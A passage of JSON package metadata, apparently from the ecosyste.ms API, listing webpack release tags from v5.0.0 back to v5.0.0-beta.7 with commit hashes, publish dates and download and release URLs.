0T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependenc